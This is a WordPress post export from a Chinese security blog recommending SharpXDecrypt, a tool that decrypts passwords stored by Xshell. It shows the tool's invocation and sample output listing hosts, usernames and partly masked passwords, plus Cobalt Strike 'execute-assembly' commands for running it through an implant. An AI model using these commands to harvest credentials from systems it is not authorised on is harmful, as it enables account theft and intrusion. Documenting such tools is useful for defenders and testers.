{"id":1011,"date":"2022-11-13T23:58:37","date_gmt":"2022-11-13T15:58:37","guid":{"rendered":"https:\/\/blog.langsasec.cn\/?p=1011"},"modified":"2022-11-14T22:07:33","modified_gmt":"2022-11-14T14:07:33","slug":"sharpxdecrypt","status":"publish","type":"post","link":"https:\/\/blog.langsasec.cn\/index.php\/2022\/11\/13\/sharpxdecrypt\/","title":{"rendered":"\u5de5\u5177\u63a8\u8350\u2014\u2014SharpXDecrypt"},"content":{"rendered":"

<\/span>\u524d\u8a00<\/span><\/h2>\n

\u4e0a\u56de\u53d1\u4e86\u5de5\u5177\u63a8\u8350\u2014\u2014SharpDecryptPwd<\/a>\uff0c\u53c8\u53d1\u73b0\u4e86\u8fd9\u4e2a\uff0c\u8fd9\u4e2a\u662f\u53c2\u8003SharpDecryptPwd\u5f00\u53d1\u7684\u53e6\u4e00\u4e2a\u5de5\u5177\u3002<\/p>\n

<\/span>\u7b80\u4ecb<\/span><\/h2>\n

Xshell\u5168\u7248\u672c\u51ed\u8bc1\u4e00\u952e\u6062\u590d\u5de5\u5177\uff0c\u9488\u5bf9Xshell\u5168\u7248\u672c\u5728\u672c\u5730\u4fdd\u5b58\u7684\u5bc6\u7801\u8fdb\u884c\u89e3\u5bc6\uff0c\u5305\u62ec\u6700\u65b0\u76847\u7cfb\u5217\u7248\u672c\u3002<\/p>\n

<\/span>\u9879\u76ee\u5730\u5740<\/span><\/h2>\n
\n

https:\/\/github.com\/JDArmy\/SharpXDecrypt<\/a><\/p>\n<\/blockquote>\n

<\/span>\u4f7f\u7528\u65b9\u6cd5<\/span><\/h2>\n

<\/span>cmd.exe \u81ea\u52a8\u5bfb\u627esession\u8def\u5f84<\/span><\/h4>\n
C:\\Users\\asus\\Desktop\\DEV\\SharpXDecrypt\\bin\\Debug> .\\SharpXDecrypt.exe\n\nXshell\u5168\u7248\u672c\u51ed\u8bc1\u4e00\u952e\u5bfc\u51fa\u5de5\u5177!(\u652f\u6301\u6700\u65b0Xshell 7\u7cfb\u5217\u7248\u672c!)\nAuthor: 0pen1\nGithub: https:\/\/github.com\/JDArmy\n[!] WARNING: For learning purposes only,please delete it within 24 hours after downloading!\n\n[*] Start GetUserPath....\n  UserPath: E:\\NetSarang Computer\\xshell6\n  UserPath: C:\\Users\\asus\\Documents\\NetSarang Computer\\7\n[*] Get UserPath Success !\n\n[*] Start GetUserSID....\n  Username: asus\n  userSID: S-1-5-21-736521517-423******97-1340300005-1001\n[*] GetUserSID Success !\n\n  XSHPath: E:\\NetSarang Computer\\xshell6\\Xshell\\Sessions\\192.168.1.110.xsh\n  Host: 192.168.1.110\n  UserName: wwwuser\n  Password: www*******Aqx\n  Version: 6.0\n\n  XSHPath: C:\\Users\\asus\\Documents\\NetSarang Computer\\7\\Xshell\\Sessions\\192.168.1.110.xsh\n  Host: 192.168.1.110\n  UserName: wwwuser\n  Password: ww********Aqx\n  Version: 7.1\n\n  XSHPath: C:\\Users\\asus\\Documents\\NetSarang Computer\\7\\Xshell\\Sessions\\Tokyo.xsh\n  Host: 198.13.51.134\n  UserName: root\n  Password: W8*********PN__%\n  Version: 7.1<\/code><\/pre>\n
<\/span>cmd.exe \u6307\u5b9asession\u8def\u5f84<\/span><\/h4>\n
C:\\Users\\asus\\Desktop\\DEV\\SharpXDecrypt\\bin\\Release> .\\SharpXDecrypt.exe "C:\\Users\\asus\\Documents\\NetSarang Computer\\7\\Xshell\\Sessions"\n\nXshell\u5168\u7248\u672c\u51ed\u8bc1\u4e00\u952e\u5bfc\u51fa\u5de5\u5177!(\u652f\u6301Xshell 7.0+\u7248\u672c)\nAuthor: 0pen1\nGithub: https:\/\/github.com\/JDArmy\n[!] WARNING: For learning purposes only,please delete it within 24 hours after downloading!\n\n[*] Start GetUserSID....\n  Username: asus\n  userSID: S-1-5-21-736521517-4232353097-1340300005-1001\n[*] GetUserSID Success !\n\n  XSHPath: C:\\Users\\asus\\Documents\\NetSarang Computer\\7\\Xshell\\Sessions\\192.168.1.110.xsh\n  Host: 192.168.1.110\n  UserName: wwwuser\n  Password: www*******qx\n  Version: 7.1\n\n  XSHPath: C:\\Users\\asus\\Documents\\NetSarang Computer\\7\\Xshell\\Sessions\\\u65b0\u5efa\u4f1a\u8bdd.xsh\n  Host: 127.0.0.1\n  UserName: root\n  Password: 78******6\n  Version: 7.1\n\n[*] read done!<\/code><\/pre>\n
<\/span>Cobalt Strike<\/span><\/h4>\n
execute-assembly \/path\/to\/SharpXDecrypt.exe\nexecute-assembly \/path\/to\/SharpXDecrypt.exe  "C:\\Users\\asus\\Documents\\NetSarang Computer\\7\\Xshell\\Sessions"<\/code><\/pre>\n
<\/span>\u83b7\u53d6<\/span><\/h2>\n
\n
\u5173\u6ce8\u6d6a\u98d2sec\u56de\u590dSharpXDecrypt<\/code>\u83b7\u53d6\u5feb\u901f\u4e0b\u8f7d\u5730\u5740<\/p>\n<\/blockquote>\n","protected":false},"excerpt":{"rendered":"
\u524d\u8a00 \u4e0a\u56de\u53d1\u4e86\u5de5\u5177\u63a8\u8350\u2014\u2014SharpDecryptPwd\uff0c\u53c8\u53d1\u73b0\u4e86\u8fd9\u4e2a\uff0c\u8fd9\u4e2a\u662f\u53c2\u8003SharpDecryptPw […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[36],"tags":[],"class_list":["post-1011","post","type-post","status-publish","format-standard","hentry","category-tools"],"_links":{"self":[{"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/posts\/1011","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/comments?post=1011"}],"version-history":[{"count":2,"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/posts\/1011\/revisions"}],"predecessor-version":[{"id":1059,"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/posts\/1011\/revisions\/1059"}],"wp:attachment":[{"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/media?parent=1011"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/categories?post=1011"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/tags?post=1011"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}